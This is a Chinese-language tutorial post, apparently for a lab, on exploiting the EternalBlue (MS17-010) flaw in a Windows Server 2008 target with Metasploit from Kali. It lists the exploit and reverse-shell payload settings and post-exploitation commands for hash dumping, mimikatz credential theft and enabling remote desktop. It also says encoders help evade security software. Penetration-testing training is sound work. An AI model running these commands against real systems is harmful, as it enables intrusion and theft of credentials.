MSF - 拿下目标服务器最高权限
1. 我们准备一台靶机(被攻击机器)
Windows server 2008 edition 64位(32位靶机系统需要下载对应32位的攻击模块)
2. 我们在准备一台攻击机 kali 2021版本
3. 在靶机里面1.关闭服务器,2.开通445端口,查看靶机ip地址
4. 在攻击机查看ip地址,然后靶机和被攻击机相互ping网络看看通不通,保证网络通不丢包。
5. 开启pg数据库服务 service postgresql start
6. 初始化 msfdb数据库msfdb init
7. 开启msfconsole
每次开启 logo随机不一样
8. 查看连接数据库状态 db_status
9. 我们知道永恒之蓝漏洞编号ms17-010,我们就搜索一下 search ms17
10. 我们以上面序号0,名称exploit/windows/smb/ms17_010_eternalblue 攻击模块为例子,使用模块指令 use 序号/use 名称。use auxiliary/scanner/smb/smb_ms17_010
或者
11. 然后看一下设置,看看设置需要配置那些信息 options
我们看请求必写的yes对应参数
Rhots 是目前主机,我们设置 setrhost 192.168.167
Rport 端口 set rport 445
12. 设置payload set payload windows/x64/meterpreter/reverse_tcp
13. 配置完run
如果跑失败了,指令和配置没有问题就多跑两遍
Fail失败后,ctl+c回到上一级继续run 出现win即可。注意靶机防火墙不能开启负责失败。
14. 简单的指令
查看用户权限: meterpreter> getuid
获取hash密码: meterpreter> hashdump
上传文件: meterpreter> upload 文件名
执行文件: meterpreter> execute -fnotepad.exe
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell
15. 加载猕猴桃 load mimikatz
Mf6版本使用 wiki指令
16. 使用 creds_all
17. 我们可以开通远程桌面 run post/windows/manage/enable_rdp
18. 登录
19. 比如我们执行打开计算器或者记事本
Execute -f calc.txt/notepad.exe
综合框架
Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持
Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码
Post 后渗透攻击模块收集更多信息或进一步访问被利用的目标系统
Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截
其他指令
简单好用的帮助指令
help/? 帮助菜单
exit 退出MSF控制台
Back 返回上一级
info 显示一个或者多个模块的信息
show 显示所给类型的模块
background 将当前操作在后台运行
use 使用所选择的模块
set 设置选项
unset 取消设置的选项
session 会话
页:
[1]